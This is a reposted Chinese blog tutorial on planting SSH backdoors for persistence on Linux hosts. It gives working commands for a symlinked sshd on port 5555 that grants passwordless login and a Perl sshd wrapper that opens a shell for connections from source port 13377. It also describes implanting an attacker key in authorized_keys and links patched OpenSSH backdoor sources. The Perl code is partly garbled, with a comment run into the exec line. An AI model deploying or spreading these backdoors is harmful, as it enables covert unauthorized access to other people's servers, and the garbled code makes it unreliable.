专栏首页漫流砂SSH 后门 | Nmap 脚本

SSH 后门 | Nmap 脚本

0x01 软连接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;

参考链接如下:

  • https://www.cnblogs.com/sevck/p/6495884.html
  • http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/

0x02 SSH Wapper 后门

cd /usr/sbin/
mv sshd ../bin
vim sshd //编辑sshd内容为以下

#!/usr/bin/perl
exec"/bin/sh" if(getpeername(STDIN)=~/^..4A/); // \x00\x004A是13377的大端形式exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

重启sshd
service sshd restart

指定源端口为 13377 就可以无密码连接ssh了

参考链接

如果你想修改这个源端口,设置成自己喜欢的,可以使用以下代码来实现

import struct
buffer = struct.pack('>I',13377)
print(buffer)

关于上面这行代码含义可以参考如下链接:

  • https://docs.python.org/3/library/struct.html

0x03 ssh key 后门

在我们的攻击机中使用 ssh-keygen -t rsa 生成公私钥

生成的文件在 ~/.ssh/

将公钥 id_rsa.pub 上传到目标主机,保存为 ~/.ssh/authorized_keys

之后我们就可以直接免密码登录了

这个是一种管理方式,所以文章非常多,无论你遇到权限问题,文件问题都能找到答案

0x04 修改openssh

主要是利用升级openssh修改源代码来进行留后门,网络上比较多的是 openssh-5.9p1

参考下面文章(我在centos6.0和ubuntu 16.04 下都没有成功)

https://www.freebuf.com/sectool/10474.html

还有 openssh-7.6p1 ,应该是来自奇安信的 A-TEAM

https://github.com/QAX-A-Team/openssh-7.6p1-patch

同样遗憾的是,我在 centos 6.0 和 Ubuntu 16.04上都失败了,其实在github的commits 上已经有人提出这个问题了,不过似乎他们没有人在维护这个项目了,我也没有联系上 A-TEAM 的人

以上情况都说明了一点,还得自己整,不过对我来说不是现在,所以很遗憾咱们大家还无法从我这获取现成的后门。

SSH后门到此结束!

PS: Ubuntu 安装ssh后门程序需要的一些库

libssl-dev

sudo apt install -y zlib1g zlib1g-dev

apt-get install libpam0g-dev

sudo apt install libkrb5-dev

本文分享自微信公众号 - 漫流砂(yidalidemao),作者:意大利的猫

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-06-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 提权(十) mimipenguin & mimikittenz

    https://github.com/huntergregal/mimipenguin

    意大利的猫
  • Lua 语法基础 | Nmap 脚本

    and break do else elseif end false goto for function if in local nil not or repe...

    意大利的猫
  • msf反弹一把梭 | Linux后门系列

    msf 中有很多 payload ,我们来看一下可以用来unix 中反弹shell的paylaod

    意大利的猫
  • javascript 红皮高程(8)

    今天继续,JS的数值转换。这里面的坑啊, 真是太多了。 JS有三个函数可以把非数值转为数值: Number(); parseInt(); parseFloat(...

    web前端教室
  • 射击气球

    LeetCode 452. Minimum Number of Arrows to Burst Balloons 已知在一个平面上有一定数量的气球,平面可以看...

    小飞侠xp
  • 学霸的迷宫(bfs)

    题目 问题描述   学霸抢走了大家的作业,班长为了帮同学们找回作业,决定去找学霸决斗。但学霸为了不要别人打扰,住在一个城堡里,城堡外面是一个二维 ...

    Max超
  • Spark笔记3-基本概念和流程

    RDD:弹性分布式数据集,数据可大可小,动态的变化分区数量,分布式地保存在多台机器的内存当中

    皮大大
  • OpenSSH升级版本到8.2 (CentOS7.6)

    OpenSSH升级需要对ssh卸载和安装,因此请采用 VNC连接 来进行升级操作, 进行OpenSSH原配置文件备份、旧版本OpenSSH删除、新版本Ope...

    高鹏-bryan
  • 今日关注 | 最新最全的“独角兽公司”分析报告

    独角兽为神话传说中的一种生物,它稀有而且高贵。美国著名CowboyVenture投资人Aileen Lee在2013年将私募和公开市场的估值超过10亿美元的创业...

    灯塔大数据
  • 用Python群发年终奖邮件

    double

扫码关注云+社区

领取腾讯云代金券